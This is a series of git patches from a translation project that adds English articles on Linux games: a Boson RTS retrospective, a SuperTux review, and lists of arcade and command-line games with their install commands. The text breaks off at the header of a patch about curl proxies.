+Here's a video of me trying to play. First I enable the eye candy (the shaders) and start one of the maps in the official "campaign", in which I am immediately attacked by the enemy and don't really have time to concentrate on resource collection, only to have the game crash on me before I lose to the enemy. Then I start a map without an enemy (there is supposed to be one, but my units never find it) so I have more time to actually explore all the options, buildings and units.
+
+Sound didn't work in this release, so I added some tracks from the official soundtrack to the audio track of the video.
+
+https://www.youtube.com/embed/18sqwNjlBow?feature=oembed
+
+You can clearly see that the whole codebase was still in full developer mode back in 2006. There are multiple checkboxes for debugging information at the top of the screen, and some debugging text scrolls over the actual text of the game UI. Everything can be configured in the Options dialogue, and you can easily break the game by fiddling with internal settings like the OpenGL update interval. Set it too low (the default is 50 Hz), and the internal logic will get confused. Clearly this is because the OpenGL renderer and the game logic run in the same thread, something one would probably no longer do nowadays.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_option_dialogue.png.wm.jpg)
+
+The game menu has all the standard options. There are three available campaigns, each one with its own missions. The mission overview hints that each map could have different conditions for winning and losing, e.g. in the "Lost Village" mission you are not supposed to destroy the houses in the occupied village. There are ten available colours for the players and three different species: Human, Neutral and "Smackware". No idea where that name comes from; judging from the unit models, it looks like it was just another human player with different units.
+
+There is only a single type of artificial intelligence for the computer opponent. Pretty much all other RTS games offer multiple different opponent AIs. These either follow completely different strategies or are based on a few basic AI types constrained by external factors, e.g. limiting the rate at which they can collect resources, or limiting them to certain unit types.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_game_menu.png.wm-1024x537.jpg)
+
+The game itself does not look very attractive, even with the "realistic-looking" water. Smoke looks okay, but smoke is easy. There is nothing going on on the maps: The ground has only a single texture, the shoreline is very jagged in many places, and there is no vegetation except for some lonely trees. Shadows look "wrong" (but enabling them seemed to cause crashes anyway). All the standard mouse and keyboard bindings (assign the selected units to a group, select group, move, attack, etc.) are there and working.
+
+One of the less common features is that you can zoom out of the map completely, and the engine then marks all units with a coloured rectangle. This is something Command & Conquer never had, but games like Supreme Commander offered it too.
+
+![][10]
+
+![][12]
+
+The game logic is identical to all the other "traditional" base-building RTS games. You start with a base (Boson calls it the Command Bunker) and optionally some additional buildings and units. The Command Bunker constructs all buildings; the other buildings produce units, generate electrical power, or can fight enemy units. Some buildings change the game, e.g. the existence of a Radar will show enemy units on the mini-map even if they are currently inside the fog of war. Some units can gather resources (Minerals and Oil in the case of Boson) and bring them to refineries; each unit and building costs a defined amount of these resources. Buildings require electrical power. Since war is mostly a game of logistics, finding and securing resources and destroying the opponent before the resources run out is key. There is a "Tech Tree" with dependencies, which prevents you from being able to build everything right from the start. For example, advanced units require the existence of a Tech Center or something similar.
+
+There are basically two types of user interfaces for RTS games: In the first one, building units and structures is part of the UI itself. There is a central menu, often at the left or the right of the screen, which shows all options; when you click one, production starts regardless of whether your base or factory buildings are currently visible on the screen or not. In the second one, you have to select your Command Bunker or each of the factories manually and choose from their individual menus. Boson uses the second type. The menu items are not very clear and not easily visible, but I guess once you're accustomed to them the item locations become muscle memory.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_command_bunker.png.wm-1024x579.jpg)
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_weapons_factory.png.wm-1024x465.jpg)
+
+In total the game could probably already look quite nice if somebody made a couple of nice maps and cleaned up the user interface. But there is a long list of annoying bugs. Units often simply stop if they encounter an obstacle. Mineral and Oil Harvesters are supposed to shuttle between the location of the resource and a refinery automatically, but their internal state machine seems to fail a lot. Send the collector to a Mineral Mine and it doesn't start to collect. Click around a lot and it suddenly starts to collect. When it is full, it doesn't go back to the refinery, or it goes there and doesn't unload. Sometimes the whole cycle works for a while and then breaks while you're not looking. Frustrating.
+
+Vehicles also sometimes go through water when they're not supposed to, or even go through the map geometry (!). This points at some major problem with collision detection.
+
+![](http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_vehicle_through_geometry.png.wm.jpg)
+
+The win/lose message does look a bit… beta as well 😉
+
+[![][14]][14]
+
+### Why was it never finished?
+
+I think there were many reasons why Boson died. The engine was completely home-grown and lacking a lot in terms of features, testing and performance. The less important subsystems, like audio output, were broken more often than not. There was no "real" focus on getting the basic parts (collecting resources, producing units, fighting battles) fully (!) working before time was spent on less important details like water, smoke, wind etc. There were also many technical challenges. Most users wouldn't have been able to enjoy the game even in 2006 due to the missing 3D acceleration on many Linux distributions (Ubuntu pretty much solved that in 2007, not earlier). Qt 4 had been released in 2005, and porting from Qt 3 to Qt 4 was not exactly easy. The KDE project decided to take this as an opportunity to overhaul pretty much every bit of code, leading to the KDE 4 Desktop. Boson didn't really need any of the functionality in either Qt or KDE, but it would have been necessary to port everything anyway for no good reason.
+
+The competition also became much stronger after 2004. The full source code for [Warzone 2100][15], an actual commercial RTS game with much more complicated gameplay, had been released under an open source license in 2004 and is still being maintained today. Fans of Total Annihilation started to work on 3D viewers for the game, leading to [Total Annihilation 3D][16] and the [Spring RTS][17] engine.
+
+Boson never had a big community of active players, so there was no pool from which new developers could have been recruited. Obviously it died when the last few developers carrying it along no longer felt it was worth the time, and I think it is clear that the amount of work required to turn the game into something playable would still have been very high.
+
+--------------------------------------------------------------------------------
+
+via: http://www.lieberbiber.de/2017/12/29/forgotten-foss-games-boson/
+
+作者:[sturmflut][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:
+[1]:https://marc.info/?l=kde-announce&r=1&w=2
+[2]:http://www.lieberbiber.de/wp-content/uploads/2017/03/client8.jpg
+[3]:http://boson.sourceforge.net
+[4]:https://sourceforge.net/p/boson/code/HEAD/tree/
+[5]:https://en.wikipedia.org/wiki/Accelerated_Graphics_Port
+[6]:http://www.lieberbiber.de/wp-content/uploads/2017/03/0.8-1-1024x768.jpg
+[7]:https://sourceforge.net/p/boson/code/3888/
+[8]:http://www.lieberbiber.de/wp-content/uploads/2017/03/0.9-1.jpg
+[9]:http://libufo.sourceforge.net/
+[10]:http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_game_1.png.wm-1024x510.jpg
+[11]:http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_game_1.png.wm.jpg
+[12]:http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_maximum_zoom_out.png.wm-1024x511.jpg
+[13]:http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_maximum_zoom_out.png.wm.jpg
+[14]:http://www.lieberbiber.de/wp-content/uploads/2017/12/boson_game_end.png.85.jpg
+[15]:http://wz2100.net/
+[16]:https://github.com/zuzuf/TA3D
+[17]:https://en.wikipedia.org/wiki/Spring_Engine
From 294f3bd7d0b63a5a08fb1dadd9a07c4f0b7ae4c2 Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 19:07:59 +0800
Subject: [PATCH 198/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20SuperTux:=20A=20L?=
=?UTF-8?q?inux=20Take=20on=20Super=20Mario=20Game?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...erTux- A Linux Take on Super Mario Game.md | 79 +++++++++++++++++++
1 file changed, 79 insertions(+)
create mode 100644 sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md
diff --git a/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md b/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md
new file mode 100644
index 0000000000..ee4dadcc11
--- /dev/null
+++ b/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md
@@ -0,0 +1,79 @@
+SuperTux: A Linux Take on Super Mario Game
+======
+When people think of PC games, they usually think of big titles like Call of Duty, which often cost millions of dollars to create. While those games may be enjoyable, there are many games created by amateur programmers that are just as fun.
+
+I am going to review one such game that I love to play. It's called SuperTux.
+
+https://www.youtube.com/embed/pTax8-cdiZU?enablejsapi=1&autoplay=0&cc_load_policy=0&iv_load_policy=1&loop=0&modestbranding=1&rel=0&showinfo=0&fs=1&theme=dark&color=red&autohide=2&controls=2&playsinline=0&
+
+### What is SuperTux
+
+Today, we will take a look at [SuperTux][1]. According to the description on the project's website, SuperTux "is a free classic 2D jump'n run sidescroller game in a style similar to the original [Super Mario games][2] covered under the GNU GPL."
+
+[Suggested read: 30 Best Linux Games On Steam You Should Play in 2018][11]
+
+As you would expect from the title of the game, you play as [Tux][3], the beloved penguin mascot of the Linux kernel. In the opening sequence, Tux is having a picnic with his girlfriend Penny. While Tux dances to some funky beats from the radio, an evil monster named Nolok appears and kidnaps Penny. It's up to Tux to rescue her. (Currently, you are not able to rescue Penny because the game is not finished, but you can still have a lot of fun working your way through the levels.)
+
+![][4]
+
+
+### Gameplay
+
+Playing SuperTux is very similar to Super Mario. You play through different levels to complete a world. Along the way, you are confronted by a whole slew of enemies. The most common enemies are Mr. and Mrs. Snowball, Mr. Iceblock and Mr. Bomb. The Snowballs are this game's version of the Goombas from Super Mario. Mr. Iceblock is the Koopa Troopa of the game. You can defeat him by stomping on him, but if you stomp on him again he will fly across the level taking out other enemies. Be careful because on the way back he'll hit Tux and take a life away. You jump on Mr. Bomb to stun him, but be sure to move on quickly because he will explode. You can find a list of more of Tux's enemies [here][5].
+
+Just like in Super Mario, Tux can jump and hit special blocks to get stuff. Most of the time, these blocks contain coins. You can also find powerups, such as eggs, which will allow you to become BigTux. The other [powerups][6] include Fireflowers, Iceflowers, Airflowers, and Earthflowers. According to the [SuperTux wiki][7]:
+
+> * Fireflowers will allow you to kill most badguys by pressing the action key, which makes Tux throw a fireball
+> * Iceflowers will allow you to freeze some badguys and kill some others by pressing the action key, which makes Tux throw a ball of ice. If they are frozen, you can kill most badguys by butt-jumping on them.
+> * Airflowers will allow you to jump further, sometimes even run faster. However, it can be difficult to do certain jumps as Air Tux.
+> * Earthflowers give you a light. Also, pressing the action key then down will turn you into a rock for a few seconds, which means Tux is completely invulnerable.
+>
+
+
+Occasionally, you will see a bell. That is a checkpoint. If you touch it, you will respawn at that point when you die, instead of having to go back to the beginning. You are limited to three respawns at the checkpoint before you are sent to the beginning of the level.
+
+You are not limited to the main Iceworld map that comes with the game. You can download several extra maps from the developers and the players. The game includes a map editor.
+
+![][8]
+
+### Where to Get SuperTux
+
+The most recent version of SuperTux is 0.5.1 and is available from the [project's website][9]. Interestingly, you can download installers for Windows or Mac or the source code. They don't have any Linux packages to download.
+
+However, I'm pretty sure that SuperTux is in all the repos. I've never had trouble installing it on any distro I've tried.
+
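+For example, on Debian- and Ubuntu-based distributions the package is typically named simply `supertux`, so installing it should be as easy as the following (assuming your distribution ships it):
+
+```
+sudo apt install supertux
+```
+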
+[Suggested read: Top 10 Command Line Games For Linux][10]
+
+
+### Thoughts
+
+I quite enjoyed playing SuperTux. I never played the proper Mario games, so I can't really compare the two. But I think SuperTux does a good job of being its own creation.
+
+Tux can move pretty quickly for a penguin. He also tends to slide if he changes direction too quickly. After all, he's moving on ice.
+
+If you want a simple platformer to keep your mind off your troubles for a while, this is the game for you.
+
+Have you ever played SuperTux? What is your favorite Tux-based or Linux game? Please let us know in the comments below. If you found this article interesting, please take a minute to share it on social media.
+
+--------------------------------------------------------------------------------
+
+via: https://itsfoss.com/supertux-game/
+
+作者:[John Paul][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://itsfoss.com/author/john/
+[1]:https://www.supertux.org/index.html
+[2]:https://en.wikipedia.org/wiki/Super_Mario_Bros.
+[3]:https://en.wikipedia.org/wiki/Tux
+[4]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/supertux-home.png
+[5]:https://github.com/SuperTux/supertux/wiki/Badguys
+[6]:https://github.com/SuperTux/supertux/wiki/User-Manual#powerups
+[7]:https://github.com/SuperTux/supertux/wiki/User-Manual
+[8]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/supertux-map.png
+[9]:https://www.supertux.org/download.html
+[10]:https://itsfoss.com/best-command-line-games-linux/
+[11]:https://itsfoss.com/best-linux-games-steam/
From 74f363b048cf66f9f9ba469bee86a033b88a64fa Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 19:11:45 +0800
Subject: [PATCH 199/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=205=20arcade-style?=
=?UTF-8?q?=20games=20in=20your=20Linux=20repository?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...de-style games in your Linux repository.md | 98 +++++++++++++++++++
1 file changed, 98 insertions(+)
create mode 100644 sources/tech/20180108 5 arcade-style games in your Linux repository.md
diff --git a/sources/tech/20180108 5 arcade-style games in your Linux repository.md b/sources/tech/20180108 5 arcade-style games in your Linux repository.md
new file mode 100644
index 0000000000..88c4e958d7
--- /dev/null
+++ b/sources/tech/20180108 5 arcade-style games in your Linux repository.md
@@ -0,0 +1,98 @@
+5 arcade-style games in your Linux repository
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/arcade_game_gaming.jpg?itok=84Rjk_32)
+
+Gaming has traditionally been one of Linux's weak points. That has changed somewhat in recent years thanks to [Steam][1], [GOG][2], and other efforts to bring commercial games to multiple operating systems, but those games often are not open source. Sure, the games can be played on an open source operating system, but that is not good enough for an open source purist.
+
+So, can someone who uses only free and open source software find games that are polished enough to present a solid gaming experience without compromising their open source ideals? Absolutely! While most open source games are unlikely to rival some of the AAA commercial games developed with massive budgets, there are plenty of open source games, in many genres, that are fun to play and can be installed from the repositories of most major Linux distributions.
+
+I am starting this series of articles on open source games for Linux by looking at arcade-style games. In future articles, I plan to cover board & card, puzzle, racing, role-playing, and strategy & simulation games.
+
+### AstroMenace
+
+![](https://opensource.com/sites/default/files/u128651/astromenace.png)
+
+[AstroMenace][3] is a scrolling space shooter for the modern era. It began as a closed source game, but the code and art assets have since been released under open licenses. Gameplay is fairly typical for the style of game, but it features nice, modern 3D graphics. Ship and weapon upgrades can be purchased using the points earned from shooting down enemies. The difficulty level can be tweaked by changing a wide variety of options, so the game is approachable to new players while still offering a challenge to experienced ones.
+
+To install AstroMenace, run the following command:
+
+ * On Fedora: `dnf install astromenace`
+ * On Debian/Ubuntu: `apt install astromenace`
+
+
+
+### Battle Tanks
+
+![](https://opensource.com/sites/default/files/u128651/battle_tanks.png)
+
+[Battle Tanks][4] is a fast-paced tank battle game with an overhead perspective. Players maneuver one of three different vehicle types around a map, collecting power-ups and trying to blow up their opponents. It has deathmatch, team deathmatch, capture the flag, and cooperative game modes. There are nine maps for the deathmatch and capture the flag modes and four maps for cooperative mode. The game supports split-screen local multiplayer for two players and local area network multiplayer for larger matches. Gameplay is fast-paced, and the default match length of five minutes is short, which makes Battle Tanks a nice choice for gamers who want something quick to play.
+
+To install Battle Tanks, run the following command:
+
+ * On Fedora: `dnf install btanks`
+ * On Debian/Ubuntu: `apt install btanks`
+
+
+
+### M.A.R.S.
+
+![](https://opensource.com/sites/default/files/u128651/m.a.r.s.png)
+
+[M.A.R.S.][5] is a top-down space shooter with physics similar to the classic Asteroids arcade game. Players control a spaceship while shooting at their opponents, maneuvering around the screen, and avoiding planets and opponents' incoming fire. The standard death match and team death match modes are available, but there are other modes, like one that requires pushing a ball into the opposing team's home planet, that provide some variety to the gameplay options. It supports local multiplayer, but unfortunately network multiplayer has not been implemented. Since development on the game appears to have stalled, network multiplayer is not likely to appear at any point in the near future, but the game is still fun and playable without it.
+
+To install M.A.R.S., run the following command:
+
+ * On Fedora: `dnf install marsshooter`
+ * On Debian/Ubuntu: `apt install marsshooter`
+
+
+
+### Neverball
+
+![](https://opensource.com/sites/default/files/u128651/neverball.png)
+
+With gameplay inspired by Sega's Super Monkey Ball, [Neverball][6] challenges the player to move a ball through a 3D playing field by moving the playing field, not the ball. The objective is to collect enough coins to open a level's exit and maneuver the ball to the exit before time runs out. There are seven different sets of levels, which range in difficulty from easy to impossible. The game can be played using the keyboard, mouse, or joystick.
+
+To install Neverball, run the following command:
+
+ * On Fedora: `dnf install neverball`
+ * On Debian/Ubuntu: `apt install neverball`
+
+
+
+### SuperTux
+
+![](https://opensource.com/sites/default/files/u128651/supertux.png)
+
+[SuperTux][7] is a 2D platformer modeled after Nintendo's Super Mario Bros. games. Linux's mascot, Tux the Penguin, takes the place of Mario with eggs serving as the equivalent of Super Mario Bros.'s mushroom power-ups. When Tux is powered up with an egg, he can collect flowers that grant him extra abilities. The fire flower, which lets Tux throw fireballs, is the most common in the game's levels, but ice, air, and earth flowers are included in the game's code. Collecting star power-ups makes Tux temporarily invincible, just like in the Super Mario games. The default level set, Icy Island, is 30 levels, making the game approximately the same length as the original Super Mario Bros., but SuperTux also comes with several contributed level sets, including three bonus islands, a forest island, a Halloween island, and incubator and test levels. SuperTux has a built-in level editor, so users can create their own.
+
+To install SuperTux, run the following command:
+
+ * On Fedora: `dnf install supertux`
+ * On Debian/Ubuntu: `apt install supertux`
+
+
+
+Did I miss one of your favorite open source arcade games? Share it in the comments below.
+
+### About the author
+
+Joshua Allen Holm - Joshua Allen Holm, MLIS, MEd, is one of Opensource.com's Community Moderators. Joshua's main interests are digital humanities, open access, and open educational resources. You can find Joshua on GitHub, GitLab, LinkedIn, and Zotero. He can be reached at holmja@opensource.com.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/18/1/arcade-games-linux
+
+作者:[Joshua Allen Holm][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/holmja
+[1]:http://store.steampowered.com/
+[2]:https://www.gog.com/
+[3]:http://www.viewizard.com/
+[4]:http://btanks.sourceforge.net/blog/about-game
+[5]:http://mars-game.sourceforge.net/?page_id=10
+[6]:https://neverball.org/index.php
+[7]:http://supertux.org/
From 0edd50271b8cf8be2014a6aa8d7a2811c4634bc5 Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 19:16:49 +0800
Subject: [PATCH 200/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Top=2010=20Comman?=
=?UTF-8?q?d=20Line=20Games=20For=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...808 Top 10 Command Line Games For Linux.md | 240 ++++++++++++++++++
1 file changed, 240 insertions(+)
create mode 100644 sources/tech/20160808 Top 10 Command Line Games For Linux.md
diff --git a/sources/tech/20160808 Top 10 Command Line Games For Linux.md b/sources/tech/20160808 Top 10 Command Line Games For Linux.md
new file mode 100644
index 0000000000..ebce8a8073
--- /dev/null
+++ b/sources/tech/20160808 Top 10 Command Line Games For Linux.md
@@ -0,0 +1,240 @@
+Top 10 Command Line Games For Linux
+======
+Brief: This article lists the **best command line games for Linux**.
+
+Linux has never been the preferred operating system for gaming, though [gaming on Linux][1] has improved a lot lately. You can [download Linux games][2] from a number of sources.
+
+There are dedicated [Linux distributions for gaming][3]. Yes, they do exist. But we are not going to look at the Linux gaming distributions today.
+
+Linux has one added advantage over its Windows counterpart: it has the mighty Linux terminal. You can do a whole lot of things in the terminal, including playing **command line games**.
+
+Yeah, hardcore terminal lovers, gather around. Terminal games are light, fast and a hell of a lot of fun to play. And best of all, you've got a lot of classic retro games in the Linux terminal.
+
+[Suggested read: Gaming On Linux: All You Need To Know][20]
+
+### Best Linux terminal games
+
+So let's crack on with this list and see what some of the best Linux terminal games are.
+
+### 1. Bastet
+
+Who hasn't spent hours on end playing [Tetris][4]? Simple, but totally addictive. Bastet is the Tetris of Linux.
+
+![Bastet Linux terminal game][5]
+
+Use the command below to get Bastet:
+```
+sudo apt install bastet
+```
+
+To play the game, run the below command in terminal:
+```
+bastet
+```
+
+Use the spacebar to rotate the bricks and the arrow keys to guide them.
+
+### 2. Ninvaders
+
+Space Invaders. I remember tussling for high score with my brother on this. One of the best arcade games out there.
+
+![nInvaders command line game in Linux][6]
+
+Copy and paste the command below to install nInvaders.
+```
+sudo apt-get install ninvaders
+```
+
+To play this game, use the command below:
+```
+ninvaders
+```
+
+Arrow keys to move the spaceship. Space bar to shoot at the aliens.
+
+[Suggested read: Top 10 Best Linux Games Released in 2016 That You Can Play Today][21]
+
+
+### 3. Pacman4console
+
+Yes, the King of the Arcade is here. Pacman4console is the terminal version of the popular arcade hit, Pacman.
+
+![Pacman4console is a command line Pacman game in Linux][7]
+
+Use the command to get pacman4console:
+```
+sudo apt-get install pacman4console
+```
+
+Open a terminal, and I suggest you maximize it. Type the command below to launch the game:
+```
+pacman4console
+```
+
+Use the arrow keys to control the movement.
+
+### 4. nSnake
+
+Remember the snake game in old Nokia phones?
+
+That game kept me hooked to the phone for a really long time. I used to devise various coiling patterns to manage the grown up snake.
+
+![nsnake : Snake game in Linux terminal][8]
+
+We have the [snake game in Linux terminal][9] thanks to [nSnake][9]. Use the command below to install it.
+```
+sudo apt-get install nsnake
+```
+
+To play the game, type in the below command to launch the game.
+```
+nsnake
+```
+
+Use arrow keys to move the snake and feed it.
+
+### 5. Greed
+
+Greed is a little like Tron, minus the speed and adrenaline.
+
+Your location is denoted by a blinking '@'. You are surrounded by numbers, and you can choose to move in any of the four directions.
+
+The square in the direction you choose has a number on it, and you move exactly that many steps. Then you repeat. You cannot revisit a spot you have already passed over, and the game ends when you cannot make a move.
+
+I made it sound more complicated than it really is.
+
+![Greed : Tron game in Linux command line][10]
+
+Grab greed with the command below:
+```
+sudo apt-get install greed
+```
+
+To launch the game use the command below. Then use the arrow keys to play the game.
+```
+greed
+```
+
+### 6. Air Traffic Controller
+
+What's better than being a pilot? An air traffic controller. You can simulate an entire air traffic system in your terminal. To be honest, managing air traffic from a terminal kinda feels real.
+
+![Air Traffic Controller game in Linux][11]
+
+Install the game using the command below:
+```
+sudo apt-get install bsdgames
+```
+
+Type in the command below to launch the game:
+```
+atc
+```
+
+ATC is not child's play. So read the man page first, using the command below.
+
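+Presumably the command meant here is simply the standard manual page lookup:
+
+```
+man atc
+```
+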
+### 7. Backgammon
+
+Whether you have played [Backgammon][12] before or not, you should check this out. The instructions and the control manual are very friendly. Play it against the computer, or against a friend if you prefer.
+
+![Backgammon terminal game in Linux][13]
+
+Install Backgammon using this command:
+```
+sudo apt-get install bsdgames
+```
+
+Type in the below command to launch the game:
+```
+backgammon
+```
+
+Press 'y' when prompted for rules of the game.
+
+### 8. Moon Buggy
+
+Jump. Fire. Hours of fun. No more words.
+
+![Moon buggy][14]
+
+Install the game using the command below:
+```
+sudo apt-get install moon-buggy
+```
+
+Use the below command to start the game:
+```
+moon-buggy
+```
+
+Press space to jump, 'a' or 'l' to shoot. Enjoy!
+
+### 9. 2048
+
+Here's something to make your brain flex. [2048][15] is a strategic as well as a highly addictive game. The goal is to reach the 2048 tile.
+
+![2048 game in Linux terminal][16]
+
+Copy and paste the commands below one by one to install the game.
+```
+wget https://raw.githubusercontent.com/mevdschee/2048.c/master/2048.c
+
+gcc -o 2048 2048.c
+```
+
+Type the below command to launch the game and use the arrow keys to play.
+```
+./2048
+```
+
+### 10. Tron
+
+How can this list be complete without a brisk action game?
+
+![Tron Linux terminal game][17]
+
+Yes, the snappy Tron is available in the Linux terminal. Get ready for some serious nimble action. No installation or setup hassle. One command will launch the game. All you need is an internet connection.
+```
+ssh sshtron.zachlatta.com
+```
+
+You can even play this game in multiplayer if there are other gamers online. Read more about [Tron game in Linux][18].
+
+### Your pick?
+
+There you have it, people. Top 10 Linux terminal games. I guess it's Ctrl+Alt+T time now. What is your favorite on the list? Or have you got some other fun stuff for the terminal? Do share.
+
+With inputs from [Abhishek Prakash][19].
+
+--------------------------------------------------------------------------------
+
+via: https://itsfoss.com/best-command-line-games-linux/
+
+作者:[Aquil Roshan][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://itsfoss.com/author/aquil/
+[1]:https://itsfoss.com/linux-gaming-guide/
+[2]:https://itsfoss.com/download-linux-games/
+[3]:https://itsfoss.com/manjaro-gaming-linux/
+[4]:https://en.wikipedia.org/wiki/Tetris
+[5]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/bastet.jpg
+[6]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/ninvaders.jpg
+[7]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/pacman.jpg
+[8]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/nsnake.jpg
+[9]:https://itsfoss.com/nsnake-play-classic-snake-game-linux-terminal/
+[10]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/greed.jpg
+[11]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/atc.jpg
+[12]:https://en.wikipedia.org/wiki/Backgammon
+[13]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/backgammon.jpg
+[14]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/moon-buggy.jpg
+[15]:https://itsfoss.com/2048-offline-play-ubuntu/
+[16]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/2048.jpg
+[17]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/tron.jpg
+[18]:https://itsfoss.com/play-tron-game-linux-terminal/
+[19]:https://twitter.com/abhishek_pc
+[20]:https://itsfoss.com/linux-gaming-guide/
+[21]:https://itsfoss.com/best-linux-games/
From 5d4541d2f9caf3f4fd4017b7fbdf6c1db69a9175 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Tue, 9 Jan 2018 20:57:12 +0800
Subject: [PATCH 201/371] =?UTF-8?q?=E7=A8=8D=E4=BD=9C=E4=BF=AE=E6=94=B9?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...108 SuperTux- A Linux Take on Super Mario Game.md | 12 +++++-------
1 file changed, 5 insertions(+), 7 deletions(-)
diff --git a/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md b/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md
index ee4dadcc11..5cba5cda29 100644
--- a/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md
+++ b/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md
@@ -4,7 +4,7 @@ When people usually think of PC games, they think of big titles, like Call of Du
I am going to review one such game that I love to play. It's called SuperTux.
-https://www.youtube.com/embed/pTax8-cdiZU?enablejsapi=1&autoplay=0&cc_load_policy=0&iv_load_policy=1&loop=0&modestbranding=1&rel=0&showinfo=0&fs=1&theme=dark&color=red&autohide=2&controls=2&playsinline=0&
+[video](https://www.youtube.com/embed/pTax8-cdiZU?enablejsapi=1&autoplay=0&cc_load_policy=0&iv_load_policy=1&loop=0&modestbranding=1&rel=0&showinfo=0&fs=1&theme=dark&color=red&autohide=2&controls=2&playsinline=0&)
### What is SuperTux
@@ -23,12 +23,10 @@ Playing SuperTux is very similar to Super Mario. You play through different leve
Just like in Super Mario, Tux can jump and hit special blocks to get stuff. Most of the time, these blocks contain coins. You can also find powerups, such as eggs, which will allow you to become BigTux. The other [powerups][6] include Fireflowers, Iceflowers, Airflowers, and Earthflowers. According to the [SuperTux wiki][7]:
-> * Fireflowers will allow you to kill most badguys by pressing the action key, which makes Tux throw a fireball
-> * Iceflowers will allow you to freeze some badguys and kill some others by pressing the action key, which makes Tux throw a ball of ice. If they are frozen, you can kill most badguys by butt-jumping on them.
-> * Airflowers will allow you to jump further, sometimes even run faster. However, it can be difficult to do certain jumps as Air Tux.
-> * Earthflowers give you a light. Also, pressing the action key then down will turn you into a rock for a few seconds, which means Tux is completely invulnerable.
->
-
+ * Fireflowers will allow you to kill most badguys by pressing the action key, which makes Tux throw a fireball
+ * Iceflowers will allow you to freeze some badguys and kill some others by pressing the action key, which makes Tux throw a ball of ice. If they are frozen, you can kill most badguys by butt-jumping on them.
+ * Airflowers will allow you to jump further, sometimes even run faster. However, it can be difficult to do certain jumps as Air Tux.
+ * Earthflowers give you a light. Also, pressing the action key then down will turn you into a rock for a few seconds, which means Tux is completely invulnerable.
Occasionally, you will see a bell. That is a checkpoint. If you touch it, you will respawn at that point when you die, instead of having to go back to the beginning. You are limited to three respawns at the checkpoint before you are sent to the beginning of the level.
From f2e7e509430c2d13e1b2b7ca6b183c54a2dacfe6 Mon Sep 17 00:00:00 2001
From: wxy
Date: Tue, 9 Jan 2018 21:43:40 +0800
Subject: [PATCH 202/371] PRF&PUB:20160117 How to use curl command with proxy
username-password on Linux- Unix.md
@lujun9972
---
... proxy username-password on Linux- Unix.md | 50 ++++++++++++-------
1 file changed, 33 insertions(+), 17 deletions(-)
rename {translated/tech => published}/20160117 How to use curl command with proxy username-password on Linux- Unix.md (71%)
diff --git a/translated/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md b/published/20160117 How to use curl command with proxy username-password on Linux- Unix.md
similarity index 71%
rename from translated/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
rename to published/20160117 How to use curl command with proxy username-password on Linux- Unix.md
index 8e3e1dae81..a46d892a55 100644
--- a/translated/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
